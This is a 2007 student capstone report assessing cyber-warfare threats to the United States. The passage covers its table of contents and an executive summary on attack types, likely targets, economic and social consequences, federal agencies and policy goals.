Cyberwarfare Vulnerability Assessment (2007)

Cyber-Warfare: The New Front

A Technology Assessment

E 497 B Benjamin Franklin Scholars Capstone

Final Report December 5, 2007

Zach Adams

Tyler Barker

Matthew Bruchon

Daniel Clark

Kenny Fearn

Garrett LaRue

Chris Saunders

Katie Woodruff

2

Table of Contents

0 EXECUTIVE SUMMARY ................................................................................................................................ 6

0.1 Introduction ............................................................................................................................................................ 7 0.1.1 Is Cyber-warfare a Real Threat? ............................................................................................................. 7 0.1.2 Defining Cyber-attacks ........................................................................................................................... 7

0.2 Tools ....................................................................................................................................................................... 8 0.2.1 Hacking .................................................................................................................................................. 8 0.2.2 Denial of Service .................................................................................................................................... 8 0.2.3 Computer Viruses ................................................................................................................................... 9 0.2.4 Packet Sniffing ....................................................................................................................................... 9 0.2.5 Social Engineering .................................................................................................................................. 9 0.2.6 SCADA Systems .................................................................................................................................. 10

0.3 Targets .................................................................................................................................................................. 10 0.3.1 Military and Government ..................................................................................................................... 11 0.3.2 Financial Systems ................................................................................................................................. 11 0.3.3 Critical Infrastructure............................................................................................................................ 12 0.3.4 Transportation Systems ........................................................................................................................ 12

0.4 Consequences ....................................................................................................................................................... 13 0.4.1 Economic Consequences ...................................................................................................................... 13 0.4.2 Social Effects ........................................................................................................................................ 14

0.5 National Agencies and Legislation ....................................................................................................................... 14 0.5.1 E-Government Act of 2002................................................................................................................... 14 0.5.2 National Infrastructure Advisory Council ............................................................................................. 15 0.5.3 National Strategy to Secure Cyberspace ............................................................................................... 15 0.5.4 United States Computer Emergency Response Team (US-CERT) ....................................................... 15

0.6 Policies ................................................................................................................................................................. 15 0.6.1 National Policies ................................................................................................................................... 16 0.6.2 Policy Goals .......................................................................................................................................... 16 0.6.3 Guiding Principles ................................................................................................................................ 16 0.6.4 Stakeholders ......................................................................................................................................... 17 0.6.5 Policies of Prevention ........................................................................................................................... 17 0.6.6 Policies of Response ............................................................................................................................. 17 0.6.7 Policies for Public Awareness and Training ......................................................................................... 18 0.6.8 Policies for Government Cyber-security ............................................................................................... 19 0.6.9 Policies for U.S. and International Cyber-warfare Collaboration ......................................................... 19 0.6.10 Policies for Military Use of Cyber-warfare .......................................................................................... 20

0.7 Conclusion ............................................................................................................................................................ 21 0.7.1 Is Cyber-warfare a Threat? ................................................................................................................... 21 0.7.2 The Way Forward ................................................................................................................................. 21

1 INTRODUCTION ............................................................................................................................................ 23

1.1 What Is at Stake? .................................................................................................................................................. 24 1.2 Is Cyber-Warfare a Real Threat? .......................................................................................................................... 25 1.3 Defining Cyber-attacks ......................................................................................................................................... 26

2 TOOLS FOR CYBER-ATTACKS ................................................................................................................. 27

2.1 Hacking ................................................................................................................................................................ 28 2.2 Denial of Service Attacks ..................................................................................................................................... 28

2.2.1 Vulnerabilities ...................................................................................................................................... 29 2.2.2 Sensor Networks ................................................................................................................................... 30 2.2.3 Denial of Service on the Internet .......................................................................................................... 30 2.2.4 Executing a Distributed DoS Attack ..................................................................................................... 31 2.2.5 Hacking Communities .......................................................................................................................... 33 2.2.6 Case Study - United States and China Cyber-Conflict in 2001: ........................................................... 34 2.2.7 Defense against DoS Attacks: ............................................................................................................... 35 2.2.8 Defending Individual Systems: ............................................................................................................. 35 2.2.9 Defending Local Networks: .................................................................................................................. 36 2.2.10 Defending Extended Networks: ............................................................................................................ 36 2.2.11 Case Study: Estonia DDos Attacked by Russia .................................................................................... 37

2.3 Computer Viruses ................................................................................................................................................. 37

3

2.3.1 Types of Viruses ................................................................................................................................... 38 2.3.2 Effects of Viruses ................................................................................................................................. 38 2.3.3 Defense against Viruses ........................................................................................................................ 39

2.4 Packet Sniffing ..................................................................................................................................................... 40 2.4.1 Data Streams and Packets ..................................................................................................................... 40 2.4.2 File Transfer Protocols ......................................................................................................................... 40 2.4.3 Networking Schemes ............................................................................................................................ 40 2.4.3.1 Ethernet Networks ................................................................................................................................ 40 2.4.3.2 WiFi Networks ..................................................................................................................................... 41 2.4.3.3 Network Interface Cards and Promiscuous Mode ................................................................................ 41 2.4.4 Implementations ................................................................................................................................... 42 2.4.4.1 Spoofing ............................................................................................................................................... 42 2.4.4.2 Limitations and Counters ..................................................................................................................... 42 2.4.5 Scenarios .............................................................................................................................................. 43 2.4.5.1 Public WiFi Service.............................................................................................................................. 43 2.4.5.2 University Networks............................................................................................................................. 44

2.5 Social Engineering ............................................................................................................................................... 44 2.5.1 Confidence Schemes or Trust and Attack Models ................................................................................ 44 2.5.2 Phishing ................................................................................................................................................ 44 2.5.3 Dumpster Diving .................................................................................................................................. 45 2.5.4 Case Studies .......................................................................................................................................... 45

2.6 SCADA Systems .................................................................................................................................................. 46 2.6.1 Scope of the Threat to SCADA Systems .............................................................................................. 47 2.6.2 Vulnerabilities ...................................................................................................................................... 48 2.6.2.1 Original Development Flaws ................................................................................................................ 48 2.6.2.2 Corporate Network Security ................................................................................................................. 49 2.6.2.3 Company Security Procedures.............................................................................................................. 49 2.6.2.4 Who Could Gain Access? ..................................................................................................................... 50 2.6.3 Case Studies .......................................................................................................................................... 51 2.6.3.1 Hunter Watertech ................................................................................................................................. 51 2.6.3.2 Roosevelt Dam ..................................................................................................................................... 51

3 TARGETS ........................................................................................................................................................ 52

3.1 Military and Government ..................................................................................................................................... 53 3.1.1 Data Theft and Corruption .................................................................................................................... 53 3.1.2 Battlefield Cyber-attacks ...................................................................................................................... 54 3.1.3 Foreign Threats ..................................................................................................................................... 56

3.2 Financial Systems as a Target .............................................................................................................................. 57 3.2.1 Overview .............................................................................................................................................. 57 3.2.2 Direct Attacks on Financial Systems .................................................................................................... 58

3.3 Infrastructure ........................................................................................................................................................ 59 3.3.1 Power Utilities ...................................................................................................................................... 59 3.3.1.1 Why is the Power Grid so Vulnerable? ................................................................................................ 60 3.3.1.2 What is Being Done? ............................................................................................................................ 62 3.3.2 Emergency Response ............................................................................................................................ 62 3.3.3 Communications ................................................................................................................................... 63

3.4 Transportation Systems as a Target ...................................................................................................................... 63 3.4.1 Public Transit Systems ......................................................................................................................... 64 3.4.2 Shipping Networks ............................................................................................................................... 64 3.4.3 Air Transportation Networks ................................................................................................................ 66 3.4.3.1 Aircraft Internal Electronic Control Systems ....................................................................................... 67 3.4.3.2 Air Traffic Control System ................................................................................................................... 68 3.4.4 Conclusions .......................................................................................................................................... 70

4 CONSEQUENCES ........................................................................................................................................... 72

4.1 Economic Consequences of Cyber-Warfare ......................................................................................................... 73 4.1.1 Economic Consequences of Hacking .................................................................................................... 73 4.1.2 Economic Consequences of Infrastructure Attacks .............................................................................. 73 4.1.3 Economic Consequence of Combined Attacks ..................................................................................... 75

4.2 Social Effects ........................................................................................................................................................ 76 4.2.1 Public Confidence in the Government .................................................................................................. 76 4.2.2 Public Confidence in Target ................................................................................................................. 77

4

5 NATIONAL AGENCIES AND LEGISLATION .......................................................................................... 79

5.1 E-Government Act of 2002 .................................................................................................................................. 80 5.2 National Infrastructure Advisory Council ............................................................................................................ 80 5.3 National Strategy to Secure Cyberspace ............................................................................................................... 81 5.4 United States Computer Emergency Response Team (US-CERT) ...................................................................... 81

5.4.1 US-CERT Einstein Program ................................................................................................................. 81 5.4.2 Collaborative Groups of US-CERT ...................................................................................................... 82 5.4.3 National Cyber Security Division (NCSD) ........................................................................................... 83 5.4.3.1 National Cyberspace Response System ................................................................................................ 83 5.4.3.2 Cyber Risk Management Programs ...................................................................................................... 84

6 POLICY ............................................................................................................................................................ 85

6.1 National Policies................................................................................................................................................... 86 6.2 Policy Goals ......................................................................................................................................................... 86 6.3 Guiding Principles ................................................................................................................................................ 87

6.3.1 Social Considerations ........................................................................................................................... 87 6.4 Stakeholders ......................................................................................................................................................... 88 6.5 Prevention............................................................................................................................................................. 90

6.5.1 Prevention Challenges .......................................................................................................................... 90 6.5.2 Prevention Products .............................................................................................................................. 91 6.5.3 Security Personnel ................................................................................................................................ 92 6.5.4 New Vulnerabilities .............................................................................................................................. 93 6.5.5 Computer Security and Liability ........................................................................................................... 93 6.5.6 Policy Options ...................................................................................................................................... 93

6.6 Response............................................................................................................................................................... 95 6.6.1 Judicial Response to Past Attacks ......................................................................................................... 95 6.6.1.1 Russian Man Sentenced for Hacking into Computers in the United States .......................................... 96 6.6.1.2 Melissa Virus ....................................................................................................................................... 96 6.6.1.3 Disgruntled Employee .......................................................................................................................... 96 6.6.1.4 Israeli Citizen Arrested in Israel for Hacking Government Computers ................................................ 96 6.6.1.5 Konopka Attacks .................................................................................................................................. 96 6.6.2 National Cyberspace Response System ................................................................................................ 97 6.6.3 Public and Private Ways to Communicate ............................................................................................ 98 6.6.4 Sharing Information .............................................................................................................................. 99 6.6.5 Policy Options ...................................................................................................................................... 99

6.7 Policies to Promote Cyber-security Awareness and Training ............................................................................. 100 6.7.1 Policies for Home and Small Business Users ..................................................................................... 100 6.7.2 Policies for Large Enterprises ............................................................................................................. 101 6.7.3 Policies for Critical Sectors and Infrastructures .................................................................................. 102 6.7.4 Policies for the Nation as a Whole ...................................................................................................... 103

6.8 Government Cyber-security ............................................................................................................................... 104 6.8.1 Federal Level Security ........................................................................................................................ 104 6.8.2 Agency Level Security ....................................................................................................................... 105 6.8.3 Areas for Improvement ....................................................................................................................... 106

6.9 US and International Cyber-warfare Collaboration ............................................................................................ 107 6.9.1 United States National Security Policies ............................................................................................ 107 6.9.1.1 Securing the Nation’s Cyberspace ...................................................................................................... 108 6.9.2 United States International Policies .................................................................................................... 109 6.9.2.1 Utilize International Organizations to Promote a Global “Culture of Security” ................................. 109 6.9.2.2 Develop Secure Networks .................................................................................................................. 109 6.9.2.3 Promote North American Cyberspace Security .................................................................................. 110 6.9.2.4 Establish International Network of Agencies for Information Relay.................................................. 110 6.9.2.5 Encourage Other Nations to Follow the Council of Europe Convention on Cyber-crime .................. 110 6.9.3 International Cyber-security Collaboration......................................................................................... 110 6.9.4 International Policies .......................................................................................................................... 111 6.9.4.1 United Kingdom ................................................................................................................................. 111 6.9.4.2 Germany ............................................................................................................................................. 111 6.9.4.3 Russia ................................................................................................................................................. 112 6.9.4.4 People’s Republic of China ................................................................................................................ 113

6.10 Military Policy .............................................................................................................................................. 113 6.10.1 Current Military Cyber Units .............................................................................................................. 113

5

6.10.2 Military Uses of Cyber-warfare .......................................................................................................... 114 6.10.3 Future of Cyber-warfare in the Military ............................................................................................. 114 6.10.4 Policy Questions ................................................................................................................................. 116

7 CONCLUSION............................................................................................................................................... 118

7.1 Is Cyber-warfare a threat? .................................................................................................................................. 119 7.2 The Way Forward ............................................................................................................................................... 119

7.2.1 What Can Be Done Now .................................................................................................................... 119 7.2.2 Policies for the Near Future ................................................................................................................ 120 7.2.3 Future Research .................................................................................................................................. 121 7.2.4 Conclusion .......................................................................................................................................... 121

8 APPENDIX ..................................................................................................................................................... 122

8.1 Policy Options .................................................................................................................................................... 123 8.2 Open Letter to the President ............................................................................................................................... 128 8.3 Interview with Douglas Reeves .......................................................................................................................... 133 8.4 DHS Presidential Directive ................................................................................................................................ 136 8.5 Works Cited ........................................................................................................................................................ 137

6

0 Executive Summary

7

0.1 Introduction

In the United States, nearly every vital system is connected in some way to the Internet.

Originally designed to allow communication in the event of a nuclear war, the Internet could be

the next weapon to attack a society revolving around information technology. Cyber-warfare

has the potential to cause catastrophic damage to these systems in a world vastly influenced by

cyberspace.

Given this assumption, one must address the probability of various types and combinations of

cyber-attacks that could damage critical systems, as well as the options for response and

prevention. Securing these systems will require significant resources from the public and private

sector, as well as significant efforts from everyone connected to the Internet. Given the power

and influence of cyber-warfare, there are also possibilities of cyber-warfare as an effective

military offensive weapon.

0.1.1 Is Cyber-warfare a Real Threat?

Many of our critical computer systems are not completely reliant on computers to make them

appealing or practical targets for attack. This means that at present, a cyber-attack would most

effective in conjunction with a traditional attack to cause physical damage; the more likely

consequences of a focused cyber-attack are economic and social. However, as reliance on

computers is increasing steadily with time, future threats will develop where current threats do

not exist, and the risk of physical damage and loss of life from a cyber-attack will increase

without implementation of proactive policies.

0.1.2 Defining Cyber-attacks

There are three primary classes of cyber-attacks: cyber-crime, cyber-terrorism, and cyber-

warfare. If an attack is not intended to threaten national security or further a national or

ideological objective, it is considered cyber-crime.1 If it is inteneded to achieve a national or

ideological objective, then it is classified as either cyber-warfare or cyber-terrorism.

Cyber-terrorism refers to cyber-attacks launched by individuals or small organizations that are

intended to further political or social objectives by coercing a government or its people2.

Cyber-warfare has the same objectives as cyber-terrorism, except that it consists of cyber-attacks

launched by a national government as an act of war, just as a physical attack would be3.

1 Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring

2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf> 2 Denning, D. (2001). "Is Cyber Terror Next?" New York: U.S. Social Science Research Council, at

http://www.ssrc.org/sept11/essays/denning.htm 3 Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring

2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf>

http://www.ssrc.org/sept11/essays/denning.htm

8

0.2 Tools

0.2.1 Hacking

Traditionally, the term “hacker” has simply been used to refer to a skilled computer user.4 In

recent years, this term has been seized by the media and has come to refer specifically to

malicious computer users. Due to the popularity and familiarity of the term, “hacking” will be

used in this document to refer to all forms of cyber-attacks, and “hacker” for the individuals

initiating them.

Most hackers are either financially or socially motivated, and have Internet communities

dedicated to hacking in which they can share software exploits and other methods of launching

cyber-attacks. Sometimes hackers even sell these vulnerabilities on underground auction sites.5,6

Their goals usually consist of information theft or damage to computer systems, since they can

use vulnerabilities in sensitive systems and stolen information to cripple vital computer

processes. The tools in this section are a small section of a hacker’s arsenal, but provide a

functional idea of how hackers view the systems that governments and corporations use to store

and transfer information.

0.2.2 Denial of Service

Denial of Service (DoS) attacks can disable networks or computers by overloading network

traffic, cut off communication between two computers, deny an individual user access to a

system, or disrupt service for a particular system or person. Unfortunately, DoS attacks exploit

the most basic limits of computers: they have finite memory, finite processing speed, and finite

communication bandwidth. 7

There will never be away to fully overcome these limitations and prevent DoS attacks, since a

system can be disabled as soon as it runs out of one of these needed limited resources. DoS

attacks can disable practically any networked device, including but not limited to sensor

networks and cell phones, not just computers. A distributed DoS attack can take control of

unprotected computers, usually by exploiting systems with a known security flaw, and then using

these computers to attack a specific target. These security flaws are usually distributed

throughout hacker communities, where hackers discuss and simplify their methods of cyber-

attack. In these past, these targets have included the DNS servers that keep the Internet

operational.8

4 Raymond, Eric. The on-line hacker Jargon File 4.4.7. 29 Dec 2003. 26 Nov 2007

http://www.catb.org/jargon/html/index.html 5 Naraine, Ryan. Hackers Selling Vista Zero-Day Exploit. 15 Dec 2006. eWeek.com. 26 Nov 2007.

<http://www.eweek.com/article2/0,1895,2073611,00.asp> 6 Evers, Joris. Russian hackers ‘sold WMF exploit’. 3 Feb 2006. ZDNet.co.uk. 26 Nov 2007.

<http://news.zdnet.co.uk/software/0,1000000121,39250232,00.htm> 7CERT Coodination Center – Denial of Service Attacks. 4 Jun 2001. US CERT. 30 Oct 2007

<http://www.cert.org/tech_tips/denial_of_service.html> 8Garber, Lee. Denial-of-Service Attacks Rip The Internet . IEEE – Computer. Apr 2000. 12 - 17

9

0.2.3 Computer Viruses

Viruses are a type of unwanted software that run on a computer and are designed to self-replicate

and spread to other computers. They are characterized by the way they spread to other systems

and their effects can range from displaying an annoying message to causing massive data loss,

giving remote control of a computer, and disrupting network communication.

There is a large industry based on the development of tools like virus scanners to eliminate

viruses before they can cause damage. Virus scanners are a type of software that searches a

computer for viruses and assists in their removal, and are regularly updated to defend against

new viruses. However, hackers are constantly racing with security professionals to stay ahead of

these tools, and they have the advantage in that they can create new viruses and use them to

cause damage before the virus is discovered and the scanner is updated to detect and remove it. 9

0.2.4 Packet Sniffing

Packet sniffing is used to monitor traffic between devices on a network, and has a number of

legitimate uses. However, hackers can also use packet sniffing to obtain sensitive data packets

without penetrating a computer network’s security measures. Hackers can collect data by many

methods, including data streams between two computers, unencrypted e-mails, unsecured WiFi

networks, and network interface cards running in “promiscuous mode.” 10

These techniques can be particularly valuable to hackers on large networks, like public WiFi

access points or university networks, where a large amount of poorly secured information is

frequently transferred. Once a hacker is a network, he can use a variety of free, open-source

packet sniffing programs to collect data packets, or “spoof” his computer’s identity on a network

to receive data that was not intended for him. However, limitations to the capabilities of packet

sniffing are non-packet data transfers, secure programming with extra data encryption, packet

sniffer detection programs, and increased public awareness about the threat.

0.2.5 Social Engineering

Social engineering combines hacking with low-tech methods like confidence schemes, physical

surveillance, and probing emails. A confidence scheme can be used to obtain answers to

password protection questions for many major websites and email clients. Email passwords are

particularly useful targets, as even more websites use password recovery systems that send the

old or changed password to the user’s email. Another technique, called “phishing”, refers to

fraudulent emails and websites designed to steal information from victims. Some hackers may

even resort to dumpster diving, since many large companies simply throw out papers containing

9 Nachenberg, Carey. "Computer Virus-antivirus Coevolution." Communications of the ACM 40.1 (1997): 46-51.

10 Crenshaw, Adrian. A Quick Intro to Sniffers. 30 July 2007. Iron Geek.com. 30 Oct 2007.

<http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers>.

http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers

10

information like tax records, payroll account logins and passwords, and building security alarm

codes. 11

0.2.6 SCADA Systems

Supervisory Control and Data Acquisition (SCADA) systems collect data from sensors in a

factory or infrastructure plant and can make changes remotely to optimize a process based on the

received data. These systems control a number of physical parameters, such as a conveyor belt’s

speed, a tank’s temperature and pressure, or any process which can be controlled without direct

human manipulation. As a result, hackers can infiltrate these systems and cause direct physical

effects. 12

The biggest security vulnerabilities of SCADA systems are in their original design—most

systems currently in use were designed twenty or more years ago, and are unsecured because

they did not account for the emergence of corporate networks. Because they were not intended

to be networked, most SCADA systems being used in critical infrastructure are not properly

secured and have multiple entry points that can be exploited. 13

Moreover, security systems of corporate networks, through which hackers can reach the SCADA

systems, are often improperly implemented. As a result, many serious cyber-incidents involving

SCADA systems have already occurred, including one in Australia in which a former water

company employee drained millions of gallons of sewage into parks and rivers, and one in which

a 12-year-old boy accidentally gained control over the Roosevelt Dam’s floodgate controls.14

0.3 Targets

As the entire world continuously becomes more connected through the Internet, the threat of

cyber-attacks has become an issue that should not be ignored. Our nation’s cyber-security is

something that must be fixed due to the fact that cyber-attacks can be performed by any

individual, group, or government. The difficult aspect of protecting ourselves is that cyber-

warfare targets are not limited to governmental agencies and the military, it also affects global

corporations, public utilities, and transportations systems.

Because the United States is so dependant on its critical infrastructure (Internet, power, et

cetera), it is absolutely critical that the government makes securing our cyberspace a top priority.

11

Grifter. Dumpster Diving – One Man’s Trash… Hack In The Box. 2002. 26 Nov 2007.

<http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&or

der=0&thold=0> 12

Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia

Institute of Technology. 1-6. 15 Oct. 2007

<http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>. 13

Understanding SCADA System Security Vulnerabilities. Riptech. 2001. 1-5. 23 Oct. 2007

<http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>. 14

Gellman, Barton. "U.S. Fears Al Qaeda Cyber Attacks." SecurityFocus 26 June 2002. 18 Oct. 2007

<http://www.securityfocus.com/news/502>.

11

Before policy options can be discussed, we must first review potential threats to and

vulnerabilities of our systems.

0.3.1 Military and Government

Because the government and military are what keeps the United States running, they are an

obvious target for cyber-attack. Over the past decade, several data theft attempts have been

documented in which hackers break through network defenses searching for critical

governmental and military documents. One such attack, known as “Moonlight Maze,” resulted

in troop structures and base configurations to be stolen from the Pentagon. 15

This example

demonstrates the severity of our military’s cyber-security issues.

Another form of cyber-attacks that concerns the military are battlefield attacks. Although the

threat on the front lines is limited, hackers could infiltrate command and control systems in the

rear, and give false commands or send incorrect troop information, leading to an ambush. 16

Therefore, due to the potential harm that can be done if the military’s communication system

were infiltrated, cyber-defenses in this realm must be improved.

0.3.2 Financial Systems

The biggest threat to our nation’s financial systems come from terrorist organizations that have

no current interest in the welfare of the United States economy. Osama bin Laden made his

goals very clear in 2001 when he stated:

If their economy is destroyed, they will be busy with their own affairs rather than

enslaving the weak peoples. It is very important to concentrate on hitting the U.S.

economy through all possible means. 17

From his comments, and the fact that over half of all cyber-attacks in 2001 targeted financial

systems,18

the need to secure our banking and credit unions from cyber-attack is clear.

Financial service providers have historically had a reputation for protecting clients’ critical data

and financial assets, but current vulnerabilities in electronic financial transfer systems threaten to

expose those assets and information to cyber-attack. For example, money transfers made

through wireless Internet or cell phones can be intercepted, and the fiber optic cables that enable

transfer of financial data around the world can be tapped without detection.

15

Cyber-war!.” PBS: Frontline. April 2003. 29 Oct. 2007

<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/> 16

Krebs, Brian. “Cyber war games test future troops.” Washington Post: April 23, 2003. 17

“Capital Commerce. So How Goes Bin Laden’s War on the U.S. Economy?” Pethokoukis, James. September

11, 2007 18

Glaessner, Thomas. “Electronic Security: Risk Mitigation In Financial Transactions”. The World Bank: 2002.

12

0.3.3 Critical Infrastructure

America’s critical infrastructure is one of the most vulnerable structures to cyber-attack in our

nation. Systems such as power grids, communications, and emergency response are linked

through thousands of miles of Internet lines, making it almost impossible to secure the entire

network. 19

The threat of infrastructure attack was realized in 2001 when the FBI discovered that cyber-

intruders were researching utilities, government offices, and emergency systems of cities all over

the country. This discovery became even more terrifying when, a few months later, American

intelligence agencies seized Al Qaeda laptops and found what appeared to be a “broad pattern of

surveillance of U.S. infrastructure.” 20

If an attacker successfully hacked into a power utility grid, they could potentially be able to shut

down plants, and even break power generators. Although they would not be able to take out the

entire power grid due to the redundancies built into the system, the attackers could shut off the

power in a region causing significant damage to the area’s economy. 21

Another potentially disastrous situation dealing with power utilities and communication systems

is if an opposing government used a cyber-attack in conjunction with a physical attack. This

would cause power outages and public chaos due to the inability to relay information during a

time of crisis. The government must lead research efforts to secure our infrastructures in order to

prevent and defend against cyber-attacks.

0.3.4 Transportation Systems

Transportation systems could conceivably be an appealing target to potential cyber-attackers due

to the integral role they play in the economy. Over ten percent of the United State’s gross

domestic product comes from transportation. 22

Of all the nation’s transportation systems, the aviation network currently has the highest risk of

cyber-attack due to its extensive computer networks. Other systems that can be attacked are

public transit systems and shipping networks, but their relatively low use of computer systems

keep the potential for devastating attacks low. However, the air traffic control system for the

19

Shainker, R. “Electric Utility Responses to Grid Issues.” .” IEEE Power & Energy Magazine. March/April 2006:

31. 24 Oct. 2007

<http://www.lib.ncsu.edu:2178/iel5/8014/33609/01597993.pdf?tp=&arnumber=1597993&isnumber=33609>

20

“Cyber-war!.” PBS: Frontline. April 2003. 29 Oct. 2007


Meserve, J. “Staged cyber attack reveals vulnerability in power grid.” CNN. 26 September 2007. 4 Oct. 2007. <

http://www.cnn.com/2007/US/09/26/power.at.risk/>

22

Szyliowicz, Joseph S. (2004).International transportation security. Review of Policy Research. 21

13

aviation network is extremely vulnerable due to the outdated computers and defenses that are

being used. 23

Regional air traffic control centers have shut down several times in recent history, but in each

case neighboring control centers were able to handle the additional traffic load. If an attacker

were able to hack into the air traffic control computers and shut down the entire nation’s air

traffic radar or communications sytems, though—something that has not happened to date—

planes would have to navigate and land without assistance, raising the risk of accident and

opening the door for some kind of conventional attack. Due to the potential worst-case damage

that could result from cyber-attacks on the aviation network, these computer systems must be

more fully secured.

0.4 Consequences

The discussion of vulnerabilities above demonstrated that the direct, physical damage

caused by a cyber-attack depends completely on the nature of the attack and its target.

While the potential economic and social consequences of an attack can also vary widely,

and are speculative in nature, evidence suggests those consequences could be as

considerable as the physical damage, if not more so.

0.4.1 Economic Consequences

Cyber-warfare incidents can be costly even when conducted by small groups of attackers. There

have been several incidents of hackers causing significant financial damage. For example, the “I

Love You” virus caused $10 billion in damage. This virus was created by a single PhD thesis-

rejected student in the Philippines.

An even greater threat lies in the many critical infrastructures that could be attacked. The

transportation system is an appealing target to potential cyber-attackers due to the integral role

they play in the economy. Transportation accounts for over 10 percent of the nation’s gross

domestic product. The recent history of conventional terrorism also suggests that cyber-attackers

may choose to target transportation systems, provided feasible opportunities exist. Eighteen of

the twenty-five major terrorist attacks from 1983 to 2001 “involved the use of transportation

vehicles as weapons, and another five involved attacks on planes.”24

Only one successful cyber-

attack on the transportation system that caused significant damage or loss of life would be

needed for an impact to be felt on the economy and public perception.

A successful attack on the power grid presents the greatest economic threat among critical

infrastructures. The New York power outage that lasted only one day cost the United States an

estimated $6 Billion.25

The cost of a regional power outage caused by a cyber-attack could

23

http://www.gao.gov/new.items/d05712.pdf 24

Szyliowicz, Joseph S. (2004).International transportation security. Review of Policy Research. 21 25

“An Analysis of the Consequences of the August 14th

2003 Power Outage and its Potential Impact on Business

Strategy and Local Public Policy”. 2004. < http://www.acp-international.com/southtx/docs/ne2003.pdf>

14

approach one trillion dollars per month. An impact this big on the U.S. economy affect almost

every citizen in the country.

0.4.2 Social Effects

Because there has not been, to date, a successful cyber-attack on the United States on a

large enough scale to widely affect the general population, the possible social

consequences are largely speculative.

One predictable result of a successful, or nearly successful, attack is that the public could

lose confidence in the government’s ability to protect the nation from cyber-attack.

Polling already shows a majority of the public feels the nation needs new legislation to

strengthen cyber-security26

, and experts have repeatedly warned the government to do

so.27

If a massive cyber-attack occurred, the public could lose faith in the government

rapidly. If a specific private sector entity responsible for infrastructures or other critical

systems were attacked, that entity could experience a similar loss of trust.

However, data also exists to suggest that the social impacts of a cyber-attack would likely

be brief unless the attack led to considerable physical damage or loss of life. For

example, several accidents and other recent cyber-incidents have caused air traffic control

centers to shut down, but no data exists to suggest those incidents had any effect on

potential air travelers. Even in the case of September 11, the loss of demand for air travel

was greatly reduced only two years later.28

Another case in which the social impacts

might be long term would be ongoing successful attacks that may not cause considerable

physical damage or loss of life, but were none the less unable to be prevented.

0.5 National Agencies and Legislation

In recent years, several documents and laws have been created to define the outline the

government’s role in dealing with cyber-security issues, beginning with the E-Government Act

of 2002. Since that time, several new agencies have been created to accomplish the nation’s

cyber-security objectives.

0.5.1 E-Government Act of 2002

Much of the federal government’s current policy and organizational structure to deal with

cyber-warfare was created by the E-Government Act of 2002. The Act established that

the Office of Management and Budget (OMB) was responsible for overseeing other

federal organizations’ cyber-security policies. The Department of Homeland Security

26

Poll Shows Americans Want Congress to Do More to Protect Them Online." Cyber Security Industry Alliance

(2006): 30. 21 Oct. 2007 27

Interview: O. Sami Saydjari." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007

<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/saydjari.html 28

Ito, Harumi, and Darin Lee. Assessing the Impact of the September 11 Terrorist Attacks on U.S. Airline Demand.

Dept. of Econ., Brown U. 2004. 3-24. 26 Oct. 2007

15

has also become responsible for coordinating many of those agencies. The E-

Government Act also outlined the roles several other organizations should fill in dealing

with cyber-security.

0.5.2 National Infrastructure Advisory Council

One organization outlined by the E-Government Act is the President’s Critical

Infrastructure Protection Board (PCIPB), now known as the National Infrastructure

Advisory Council (NIAC).29

The NIAC is designed to supply the executive branch with

the information needed to secure the information systems of critical infrastructure sectors,

and it deals with both prevention and recovery strategies. 30

0.5.3 National Strategy to Secure Cyberspace

In 2003, before its name was changed, the PCIPB published the National Strategy to

Secure Cyberspace (NSSC), a document outlining stakeholders, guiding principles, and

broad policy objectives to consider in improving the national cyber-warfare policy.

This assessment uses the broad policy objectives in the NSSC as a starting point for its

discussion of policies, but expands beyond the initial policy suggestions.

0.5.4 United States Computer Emergency Response Team (US-CERT)

Another organization established by the E-Government Act of 2002 is the United States

Computer Emergency Response Team (US-CERT), designed to protect the Internet from

cyber-attacks by promoting the communication of cyber-incidents between private and

public sector groups.

A number of initiatives to improve cyber-security information sharing are handled by

US-CERT, including the Einstein Program and several collaborative groups. US-CERT

also includes the National Cyber Security Division (NCSD), which is designed to

evaluate the risks of various attacks, determine what protective measures are needed, and

create a set of protocols to follow in response to cyber-incidents.

0.6 Policies

The success of existing cyber-security policies has been mixed, and cyber-security

remains an area in need of many new policies and programs. The key stakeholder groups

currently being considered are sound, and the concerns currently being addressed

29

Bush, George W., and Jim Turner. "E-Government Act of 2002." The White House. 15 Nov. 2002. US

Government. <http://www.whitehouse.gov/omb/egov/g-4-act.html>. 30

National Infrastructure Advisory Council." Department of Homeland Security. Oct. 2007. US Government.

<http://www.dhs.gov/xprevprot/committees/editorial_0353.shtm>.

16

correspond loosely to the broad policy areas established by the NSSC. Still, much work

remains to be done to improve cyber-security.

0.6.1 National Policies

A portion of the Department of Homeland Security is dedicated to securing America from cyber-

attacks. According to the NSSC, existing national policy in this area has given the federal

government a mandate to:31

1) Prevent cyber attacks against our critical infrastructures

2) Reduce our national vulnerabilities to cyber attack and

3) Minimize the damage and recovery time from cyber attacks that do occur. Ensure the

federal government’s ability to perform essential national security missions and guarantee

the general public’s health and safety

4) Make sure that state and local governments are able to maintain order and to deliver

minimum essential public services

5) Aid in the private sector’s capability to ensure the orderly functioning of the economy

and the delivery of essential services and

6) Support the public’s morale and confidence in our national economic and political

institutions.

0.6.2 Policy Goals

Although the NSSC has been a starting point for current national policies, those policies are not

enough to protect our nation from cyber-warfare. Our policy discussion will be broken into the

following major policy areas: prevention, response, cyber-security training and awareness,

governmental cyber-security, international cyber-warfare collaboration, and military uses of

cyber-warfare.

0.6.3 Guiding Principles

In addition to meeting the above goals, several basic principles should guide future cyber-

warfare policies. For example, policies should encourage the nationwide cooperation of private

and public sector groups, strengthen rather than infringe upon personal privacies, and avoid mass

regulation except whenever practical. Also, policies should be flexible enough to adapt to the

ever-changing nature of cyber-warfare.

